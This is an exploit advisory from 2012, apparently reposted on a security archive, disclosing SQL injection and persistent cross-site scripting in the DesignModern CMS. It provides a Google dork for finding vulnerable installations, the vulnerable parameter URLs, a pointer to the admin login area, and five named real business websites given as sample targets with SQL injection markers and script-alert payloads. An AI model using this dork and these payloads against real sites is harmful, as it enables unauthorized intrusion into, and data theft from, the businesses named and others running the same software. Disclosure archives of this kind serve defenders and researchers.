DesignModern CMS Cross Site Scripting / SQL Injection

2012.05.04
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 1 0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 ========================================================================== <<<:>>> DesignModern - SQLi/XSS Presistent Vulnerability <<:>>> ========================================================================== - Discovered By: ||| TheCyberNuxbie - Independent Security Research ||| <<< nuxbie@linuxhacktivist.com >>> CP: +62856-2538-963 [ www.linuxhacktivist.com ] $ YM: nux_exploit - Info WebApps: This CMS Develop By DesignModern: http://www.designmodern.com.ar/ - Google Dork: inurl:"/ficha_propiedad.php?id_inmueble=" - Exploit Concept: http://lokalisasi/WebApps/ficha_propiedad.php?id_inmueble=[SQL Injection] http://lokalisasi/WebApps/vehiculos.php?id_categoria=[SQL Injection] http://lokalisasi/WebApps/productos.php?id_subcategoria=[SQL Injection] http://lokalisasi/WebApps/ficha_propiedad.php?id_inmueble=[XSS] http://lokalisasi/WebApps/vehiculos.php?id_categoria=[XSS]] http://lokalisasi/WebApps/productos.php?id_subcategoria=[XSS] - Private Area: http://lokalisasi/WebApps/admin/ <--- LogIn Area...!!! - Sampel WebApps SQLi Vulnerability: http://amatoautomotores.com.ar/vehiculos.php?id_categoria=8' + [SQL Injection] http://artelcacharrito.com.ar/productos.php?id_subcategoria=12' + [SQL Injection] http://galavernayasoc.com.ar/ficha_propiedad.php?id_inmueble=15' + [SQL Injection] http://goyatucci.com.ar/ficha_propiedad.php?id_inmueble=23' + [SQL Injection] http://giovobienesraices.com.ar/ficha_propiedad.php?id_inmueble=43' + [SQL Injection] - Sampel WebApps XSS Presistent Vulnerability: http://amatoautomotores.com.ar/vehiculos.php?id_categoria=<script>alert(31337);</script> http://artelcacharrito.com.ar/productos.php?id_subcategoria=<script>alert(31337);</script> http://galavernayasoc.com.ar/ficha_propiedad.php?id_inmueble=<script>alert(31337);</script> http://goyatucci.com.ar/ficha_propiedad.php?id_inmueble=<script>alert(31337);</script> http://giovobienesraices.com.ar/ficha_propiedad.php?id_inmueble=<script>alert(31337);</script> - NoteLove For Reynaey: You are my everything,,, :-) -:>>> Special Thanks <<<:- ...:::' 1337day Inj3ct0r TEAM ':::... [ All Staff & 31337 Member Inj3ct0r TEAM ] , And All Inj3ct0r Fans & All Hacktivist,,, ######################################################################### - Me @ Solo Raya, 04 May 2012 @ 07:17 AM. [ Inj3ct0r | PacketStromSecurity | Exploit-ID | Devilzc0de ] #########################################################################

References:

http://www.designmodern.com.ar/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top